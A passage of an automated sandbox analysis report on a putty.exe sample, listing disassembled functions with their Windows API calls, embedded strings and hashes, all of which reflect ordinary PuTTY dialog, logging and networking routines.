                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseDeleteEnumOpen
                            • String ID:
                            • API String ID: 4142876296-0
                            • Opcode ID: 33c8cf9486d96dfeeba33654810e47c6faa9fa40398722fd98d4c60036d4afc4
                            • Instruction ID: 8c9754fb24c85a1e9ed99114584b7dda46696f0fd76e26bd160890ab64319033
                            • Opcode Fuzzy Hash: 33c8cf9486d96dfeeba33654810e47c6faa9fa40398722fd98d4c60036d4afc4
                            • Instruction Fuzzy Hash: E0F06277500208BBEB119B94EC85EDB77BCAB05715F100172BA02D2091E674DE549FA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004566C0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ___addl
                            • String ID:
                            • API String ID: 2260456530-0
                            • Opcode ID: a57031d3826d41fa4185fc8bb056b61850cf5809c5a657e3baa8031fcfaa38dc
                            • Instruction ID: 20e121dd30b62a73a5987c52efb93d479c908b94fb66fc643d0fd64b7ce7e240
                            • Opcode Fuzzy Hash: a57031d3826d41fa4185fc8bb056b61850cf5809c5a657e3baa8031fcfaa38dc
                            • Instruction Fuzzy Hash: 76F04976400606AFDA205E52DC11E67B7ADEF44305B4A442AFD598B232F732E86DCB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043CE6A Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • EnableWindow.USER32(?,00000000), ref: 0043CE79
                            • DialogBoxParamA.USER32(0000006F,?,Function_0003C5EF,00000000), ref: 0043CE8B
                            • EnableWindow.USER32(?,00000001), ref: 0043CE94
                            • SetActiveWindow.USER32(?,?,?,004386A6,?), ref: 0043CE97
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Enable$ActiveDialogParam
                            • String ID:
                            • API String ID: 1750746890-0
                            • Opcode ID: d6e1004ed0e8d37d3a7dd8f6097f5c62410c37e37f7db7cbe9f9011426a59ac2
                            • Instruction ID: cf8ff7aa25c50bf4367434cd22a51b16713c7aac3047b7605556659b2f114e12
                            • Opcode Fuzzy Hash: d6e1004ed0e8d37d3a7dd8f6097f5c62410c37e37f7db7cbe9f9011426a59ac2
                            • Instruction Fuzzy Hash: 3FD01232245321B7D5212B15BC09FCB3A59DFC6B62F120031F600A60E186A46582CBAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041DD22 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 0041DD92
                              • Part of subcall function 0043754F: GetTickCount.KERNEL32 ref: 00437555
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick
                            • String ID: cipher settings changed$l1F
                            • API String ID: 536389180-1288798538
                            • Opcode ID: 37cc1f4bba452fd31941a3c92e4c152347f6aed089a1571b4919581d15e2f3c3
                            • Instruction ID: 037755590c7964ed9bce45aec08a3dc3ad440927693602561ca2ded80dfd27ad
                            • Opcode Fuzzy Hash: 37cc1f4bba452fd31941a3c92e4c152347f6aed089a1571b4919581d15e2f3c3
                            • Instruction Fuzzy Hash: 9351C1B1900704BBDF30AF70CC457DE7BA5EB14344F14442BF9596A2D1E7BA5A90CA49
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040E9CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402263: _wctomb_s.LIBCMT ref: 004022D1
                            • _strlen.LIBCMT ref: 0040E9F0
                            • _strlen.LIBCMT ref: 0040E9F9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_wctomb_s
                            • String ID: gvE
                            • API String ID: 412625300-3440013272
                            • Opcode ID: e7c1533d359c56cfbe03f80bb16ef1df71e80e75c0f4a465763cdb45d092ac71
                            • Instruction ID: 9385c3af9ee7fc7988ff63bbafa3d5ef767caadab69462dc6d873d994c89d382
                            • Opcode Fuzzy Hash: e7c1533d359c56cfbe03f80bb16ef1df71e80e75c0f4a465763cdb45d092ac71
                            • Instruction Fuzzy Hash: 8B41F671D04148EFEF119FA69841AAF7FA5EB19304F1408BBF98173292D3394E21DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0045465E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: $
                            • API String ID: 1807457897-3032137957
                            • Opcode ID: cfd2078484904b03652ffcce17ea91c1e5cd38d10a5da9535ec71e645dd1aabd
                            • Instruction ID: e293c6174213da809473671e62f3e80c07c5b42daa28f1cbedd4753c40da3cfb
                            • Opcode Fuzzy Hash: cfd2078484904b03652ffcce17ea91c1e5cd38d10a5da9535ec71e645dd1aabd
                            • Instruction Fuzzy Hash: CA4129301082586EEB118B58DC59FFA7BE8EB4A309F6404E6DD49CB163D3584EC997DC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00456543 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004553C1: SetFilePointer.KERNEL32(00000000,0044FDD7,00000000,00000000,?,00000200,?,0044FD6D,?,00000000,00000002,?,?,00000000,?,0044FDD7), ref: 00455404
                              • Part of subcall function 004553C1: GetLastError.KERNEL32 ref: 00455411
                            • SetEndOfFile.KERNEL32(00000000,?,?,?,00000100,?,?,?,004545E1,00000000,80000000), ref: 00456647
                            • GetLastError.KERNEL32(?,?,?,00000100,?,?,?,004545E1,00000000,80000000), ref: 00456665
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorFileLast$Pointer
                            • String ID: EE
                            • API String ID: 1697706070-1871289027
                            • Opcode ID: ba8fc23caf237dfa95d83004f50e6b8037f378dbb20800f3b73f2a2fce86c3a9
                            • Instruction ID: 8ad03c32e105a8f2277c3a83af6cca2facfef73172a64635b2a61f8a01884430
                            • Opcode Fuzzy Hash: ba8fc23caf237dfa95d83004f50e6b8037f378dbb20800f3b73f2a2fce86c3a9
                            • Instruction Fuzzy Hash: 2631287190061067CB205F39DC82B9A36689B04366F92427BFD2D973D3E678E98C479C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00450751 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: __shift_strcat_strlen
                            • String ID: e+000
                            • API String ID: 208078240-1027065040
                            • Opcode ID: 246078e9e64013b2aa750b5b736563a464de749df3467947e0c7a70ae0d48823
                            • Instruction ID: 3a3ea46fa99b1caf5b65492f7c7ac0b43b6957ba20ec056d0b30ce20cbd7db09
                            • Opcode Fuzzy Hash: 246078e9e64013b2aa750b5b736563a464de749df3467947e0c7a70ae0d48823
                            • Instruction Fuzzy Hash: F931283A2057809FD7199F38DC90AA63B95AF06319B1C80BEE845CB353C679D845C755
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A902 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • WideCharToMultiByte.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0000FDE9,?,00408B41,?,00000000,00000000,00000000), ref: 0044A9EF
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: ..\windows\winucs.c$p - mbstr < mblen
                            • API String ID: 626452242-4099138194
                            • Opcode ID: 9ab7f4da5ee4f365479a2ec608e8e5b4fe9e3d628077e11bbc068df1fd06a4b2
                            • Instruction ID: 8ea2330da6aa4ede292e55c39134cb9aba10f25137eab1dd91759a04a91dcbe8
                            • Opcode Fuzzy Hash: 9ab7f4da5ee4f365479a2ec608e8e5b4fe9e3d628077e11bbc068df1fd06a4b2
                            • Instruction Fuzzy Hash: 3D31A1B1244246EBEF11CE14C880AAA3BA5FF59704B16085EF985DB241D239D8B1CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004459E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • SetEvent.KERNEL32(?,&Paste,?,?,?,?,?,?,?,0000000E), ref: 00445A4A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$EventFileModuleName_strncpy
                            • String ID: ..\windows\winhandl.c$handles_by_evtomain
                            • API String ID: 1703333348-573761421
                            • Opcode ID: 87f7cb50ad824672645637ba9a74d971bcd6b3e43b6fde2f1367ee4632098da4
                            • Instruction ID: d3221f3f774266ad5dfdf7634808aac566736a4dd63c86dc00c78d495153aa18
                            • Opcode Fuzzy Hash: 87f7cb50ad824672645637ba9a74d971bcd6b3e43b6fde2f1367ee4632098da4
                            • Instruction Fuzzy Hash: C821FD71440F01AFEB32AB258C458BB77F8EF813157140A2FF487A1542D339A9458BAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004475C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71networkCOMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32(?), ref: 004475CE
                            • socket.WS2_32(00000002,00000002,00000000), ref: 004475F9
                            Strings
                            • Unable to get list of local IP addresses, xrefs: 00447638
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htonlsocket
                            • String ID: Unable to get list of local IP addresses
                            • API String ID: 3233345542-1500252401
                            • Opcode ID: ade47a866735f45ef79af25781fca5026a3b16cbded501ecf01061f5bb2a3ec2
                            • Instruction ID: fd683b6f3d59761003ae3699fbd703b8595f4fe5257569eb93f1573ee789fd74
                            • Opcode Fuzzy Hash: ade47a866735f45ef79af25781fca5026a3b16cbded501ecf01061f5bb2a3ec2
                            • Instruction Fuzzy Hash: D6113A71349A20BAF32447399C42EAF365B9792B60F61842BF10DD1381D72C984382AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00453F49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • ___initmbctable.LIBCMT ref: 00453F5B
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\putty.exe,00000104,75570A60,00000000,?,?,?,?,0044F24B,?,00470420,00000060), ref: 00453F73
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: FileModuleName___initmbctable
                            • String ID: C:\Users\user\putty.exe
                            • API String ID: 767393020-4276210984
                            • Opcode ID: 867c797f2cc84a55a73943c8c416907671bbb4afc0d7053cf93466af54852232
                            • Instruction ID: fd3a0a6d756cdf4ca149efbbe42414777097d17c5eaff8033d3625615ca87b7a
                            • Opcode Fuzzy Hash: 867c797f2cc84a55a73943c8c416907671bbb4afc0d7053cf93466af54852232
                            • Instruction Fuzzy Hash: 1911B672A08104AFDB10DBA9EC4199B77B8EB443A6F51017AFC05D3242D6749E48C759
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DCF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • GetCharacterPlacementW.GDI32(?,?,?,00000000,?,0008113B), ref: 0043DD63
                            • ExtTextOutA.GDI32(?,?,?,?,?,00000000,?,?), ref: 0043DD85
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CharacterPlacementText
                            • String ID: $
                            • API String ID: 2370387697-3993045852
                            • Opcode ID: 58643f9e01a28be3f2b773a1e60f1cbe9f2ff598f6a176d3656c51e1f3cd9524
                            • Instruction ID: f61a35eec1c2390f81a0b448f80d304060f7f9f579c1a96e5c90197f837429ec
                            • Opcode Fuzzy Hash: 58643f9e01a28be3f2b773a1e60f1cbe9f2ff598f6a176d3656c51e1f3cd9524
                            • Instruction Fuzzy Hash: F4114C72900208BBDF219F95CC8AFDFBBBDEB08714F100126FA05B6191D7759A109BA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B0E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 0043B149
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B114
                            • c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 0043B119
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                            • API String ID: 3015471070-3468507388
                            • Opcode ID: 82b5c499cea7190c6fd1f8820b32ed1f852076e1d11ce05cc6d31acb370435a2
                            • Instruction ID: d5d5fa8d8eb9d04727cf7d4c512b50cdf67a5bbfe65ddb30aec08dca05ee76b1
                            • Opcode Fuzzy Hash: 82b5c499cea7190c6fd1f8820b32ed1f852076e1d11ce05cc6d31acb370435a2
                            • Instruction Fuzzy Hash: B5F09671740211EFDF205B08DCA1F2637A5EF89761F21506BF2499B2A1CB789C50CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D3D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000223), ref: 0043D411
                            Strings
                            • %s Log to File, xrefs: 0043D3F9
                            • The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 0043D3E7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
                            • API String ID: 2030045667-4035860868
                            • Opcode ID: 9ce7cf1bf2e40765adc9b9d565cd4ff1763c9c8d9ce53b1fd3b2e42b33e98dc4
                            • Instruction ID: d8ff5c68b93e083b80569f9bec6576f0591491d4ad44eb91bff21c47fe9baa32
                            • Opcode Fuzzy Hash: 9ce7cf1bf2e40765adc9b9d565cd4ff1763c9c8d9ce53b1fd3b2e42b33e98dc4
                            • Instruction Fuzzy Hash: A4F027726443003AD62037B66C8BF5F1A98CB85769F20803FFA00E62D3DB6C488081AE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043E5E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(Connection closed by remote host,00000040), ref: 0043E645
                            • PostQuitMessage.USER32(00000000), ref: 0043E64F
                            Strings
                            • Connection closed by remote host, xrefs: 0043E63A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$PostQuit
                            • String ID: Connection closed by remote host
                            • API String ID: 1647143952-3682140707
                            • Opcode ID: 283f09523b04d63575c5ba78243ad297d48856cfa937df088a487df4a99abfd3
                            • Instruction ID: 914c25c352eb5f0a08604521f17c2038e9ff5f22030a9409e88ea14c885e3bb9
                            • Opcode Fuzzy Hash: 283f09523b04d63575c5ba78243ad297d48856cfa937df088a487df4a99abfd3
                            • Instruction Fuzzy Hash: 2AF0AF31A09310EEDB301B25BD4A7953AD5E728326F65013BF618D61E1DBB48880CE4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • EndDialog.USER32(?,00000001), ref: 0043C5B7
                            • SetWindowTextA.USER32(?,00000000), ref: 0043C5DC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: DialogTextWindow
                            • String ID: %s Licence
                            • API String ID: 2014912272-903691534
                            • Opcode ID: 819ab9c8e8f0e98d19234f12bec839a588f08f7bd7ac5c9f8e60578949687b64
                            • Instruction ID: 0e5d72c0b5e1c0e51ebe976163ac34d89d086ac993b25a38f6b2a31386913515
                            • Opcode Fuzzy Hash: 819ab9c8e8f0e98d19234f12bec839a588f08f7bd7ac5c9f8e60578949687b64
                            • Instruction Fuzzy Hash: 67F0E933104128B7DB211F68AC459AB3F94EB0D314F408037F805E51A2D778E890D79C
                            Uniqueness

                            Uniqueness Score: -1.00%

